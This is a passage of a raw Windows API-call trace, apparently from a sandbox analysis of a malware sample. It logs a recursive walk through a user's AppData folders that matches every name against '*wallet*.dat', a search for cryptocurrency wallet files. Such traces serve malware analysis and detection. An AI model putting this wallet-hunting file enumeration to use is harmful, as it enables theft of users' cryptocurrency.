ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 0 [0234.751] FindClose (in: hFindFile=0x6e1960 | out: hFindFile=0x6e1960) returned 1 [0234.751] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x5, cFileName="CTLs", cAlternateFileName="")) returned 1 [0234.751] PathMatchSpecA (pszFile="CTLs", pszSpec="*wallet*.dat") returned 0 [0234.752] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1a20 [0234.752] FindNextFileA (in: hFindFile=0x6e1a20, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.752] FindNextFileA (in: hFindFile=0x6e1a20, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 0 [0234.752] FindClose (in: hFindFile=0x6e1a20 | out: hFindFile=0x6e1a20) returned 1 [0234.752] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x5, cFileName="CTLs", cAlternateFileName="")) returned 0 [0234.752] FindClose (in: hFindFile=0x6e1be0 | out: hFindFile=0x6e1be0) returned 1 [0234.753] FindNextFileA (in: hFindFile=0x6e1720, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x5ec61c93, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5ec61c93, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5ec61c93, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x207d0, cFileName="My", cAlternateFileName="")) returned 0 [0234.753] FindClose (in: hFindFile=0x6e1720 | out: hFindFile=0x6e1720) returned 1 [0234.753] FindNextFileA (in: hFindFile=0x6e1660, lpFindFileData=0x197ddc | out: lpFindFileData=0x197ddc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0234.753] PathMatchSpecA (pszFile="Templates", pszSpec="*wallet*.dat") returned 0 [0234.753] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6e16a0 [0234.758] FindNextFileA (in: hFindFile=0x6e16a0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80b78b76, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0xa4984c62, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa4984c62, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.758] FindNextFileA (in: hFindFile=0x6e16a0, lpFindFileData=0x197754 | out: lpFindFileData=0x197754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LiveContent", cAlternateFileName="LIVECO~1")) returned 1 [0234.758] PathMatchSpecA (pszFile="LiveContent", pszSpec="*wallet*.dat") returned 0 [0234.758] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1d20 [0234.762] FindNextFileA (in: hFindFile=0x6e1d20, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.763] FindNextFileA (in: hFindFile=0x6e1d20, lpFindFileData=0x1970cc | out: lpFindFileData=0x1970cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="16", cAlternateFileName="")) returned 1 [0234.763] PathMatchSpecA (pszFile="16", pszSpec="*wallet*.dat") returned 0 [0234.763] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1720 [0234.764] FindNextFileA (in: hFindFile=0x6e1720, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96dfa773, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.764] FindNextFileA (in: hFindFile=0x6e1720, lpFindFileData=0x196a44 | out: lpFindFileData=0x196a44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5, dwReserved1=0x6b0260, cFileName="Managed", cAlternateFileName="")) returned 1 [0234.765] PathMatchSpecA (pszFile="Managed", pszSpec="*wallet*.dat") returned 0 [0234.765] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\*", lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName=".", cAlternateFileName="")) returned 0x6e1b60 [0234.767] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d88102, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d88102, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="..", cAlternateFileName="")) returned 1 [0234.768] FindNextFileA (in: hFindFile=0x6e1b60, lpFindFileData=0x1963bc | out: lpFindFileData=0x1963bc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x207d0, dwReserved1=0x20000, cFileName="Document Themes", cAlternateFileName="DOCUME~1")) returned 1 [0234.768] PathMatchSpecA (pszFile="Document Themes", pszSpec="*wallet*.dat") returned 0 [0234.768] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\*", lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1d60 [0234.768] FindNextFileA (in: hFindFile=0x6e1d60, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x96d61fa7, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x96d61fa7, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.769] FindNextFileA (in: hFindFile=0x6e1d60, lpFindFileData=0x195d34 | out: lpFindFileData=0x195d34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x8, dwReserved1=0x6b0260, cFileName="1033", cAlternateFileName="")) returned 1 [0234.769] PathMatchSpecA (pszFile="1033", pszSpec="*wallet*.dat") returned 0 [0234.769] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\*", lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName=".", cAlternateFileName="")) returned 0x6e1be0 [0234.773] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x96d61fa7, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98c54758, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x98c54758, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="..", cAlternateFileName="")) returned 1 [0234.774] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9826b304, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9826b304, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x70d51000, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x893c1, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03090430[[fn=Banded]].thmx", cAlternateFileName="TM0309~1.THM")) returned 1 [0234.774] PathMatchSpecA (pszFile="TM03090430[[fn=Banded]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.774] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090430[[fn=Banded]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9826b304, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9826b304, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x70d51000, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x893c1, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.774] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x984f5d1e, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x984f5d1e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xa299a700, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x192bb1, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03090434[[fn=Wood Type]].thmx", cAlternateFileName="TM0309~2.THM")) returned 1 [0234.774] PathMatchSpecA (pszFile="TM03090434[[fn=Wood Type]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.774] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03090434[[fn=Wood Type]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x984f5d1e, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x984f5d1e, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xa299a700, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x192bb1, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.775] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x988e757c, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x988e757c, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xbdc7df00, ftLastWriteTime.dwHighDateTime=0x1d43fda, nFileSizeHigh=0x0, nFileSizeLow=0x883d3, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03457444[[fn=Basis]].thmx", cAlternateFileName="TM2094~1.THM")) returned 1 [0234.775] PathMatchSpecA (pszFile="TM03457444[[fn=Basis]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.775] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457444[[fn=Basis]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x988e757c, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x988e757c, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xbdc7df00, ftLastWriteTime.dwLowDateTime=0x1d43fda, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x883d3, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.775] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98acf19f, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98acf19f, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xe42a5200, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x8b615, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03457464[[fn=Dividend]].thmx", cAlternateFileName="TM5959~1.THM")) returned 1 [0234.775] PathMatchSpecA (pszFile="TM03457464[[fn=Dividend]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.775] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457464[[fn=Dividend]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98acf19f, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98acf19f, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xe42a5200, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x8b615, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.776] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9841a2b8, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x9841a2b8, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xf2786e00, ftLastWriteTime.dwHighDateTime=0x1d43fbb, nFileSizeHigh=0x0, nFileSizeLow=0x7fb28, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03457475[[fn=Frame]].thmx", cAlternateFileName="TM7844~1.THM")) returned 1 [0234.776] PathMatchSpecA (pszFile="TM03457475[[fn=Frame]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.776] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457475[[fn=Frame]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x9841a2b8, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x9841a2b8, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xf2786e00, ftLastWriteTime.dwLowDateTime=0x1d43fbb, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x7fb28, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.776] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98af6207, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x98af6207, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x34091900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0x2ef7a4, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03457485[[fn=Mesh]].thmx", cAlternateFileName="TM2703~1.THM")) returned 1 [0234.777] PathMatchSpecA (pszFile="TM03457485[[fn=Mesh]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.777] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457485[[fn=Mesh]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x98af6207, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x98af6207, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x34091900, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x2ef7a4, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.777] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x987adf7a, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x987adf7a, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0xea6cfe00, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xbddaf, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03457491[[fn=Metropolitan]].thmx", cAlternateFileName="TM5623~1.THM")) returned 1 [0234.777] PathMatchSpecA (pszFile="TM03457491[[fn=Metropolitan]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.777] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457491[[fn=Metropolitan]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x987adf7a, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x987adf7a, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0xea6cfe00, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xbddaf, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.777] FindNextFileA (in: hFindFile=0x6e1be0, lpFindFileData=0x1956ac | out: lpFindFileData=0x1956ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x980694ab, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x980694ab, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x80545900, ftLastWriteTime.dwHighDateTime=0x1d43fbc, nFileSizeHigh=0x0, nFileSizeLow=0xe1c0f, dwReserved0=0x4, dwReserved1=0x6b0260, cFileName="TM03457496[[fn=Parallax]].thmx", cAlternateFileName="TM0345~2.THM")) returned 1 [0234.777] PathMatchSpecA (pszFile="TM03457496[[fn=Parallax]].thmx", pszSpec="*wallet*.dat") returned 0 [0234.778] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\Document Themes\\1033\\TM03457496[[fn=Parallax]].thmx\\*", lpFindFileData=0x195024 | out: lpFindFileData=0x195024*(dwFileAttributes=0x980694ab, ftCreationTime.dwLowDateTime=0x1d705ee, ftCreationTime.dwHighDateTime=0x980694ab, ftLastAccessTime.dwLowDateTime=0x1d705ee, ftLastAccessTime.dwHighDateTime=0x80545900, ftLastWriteTime.dwLowDateTime=0x1d43fbc, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0xe1c0f, nFileSizeLow=0x4, dwReserved0=0x6b0260, dwReserved1=0x4d0054, cFileName="0", cAlternateFileName="C")) returned 0xffffffff [0234.778] FindNextFileA (in: 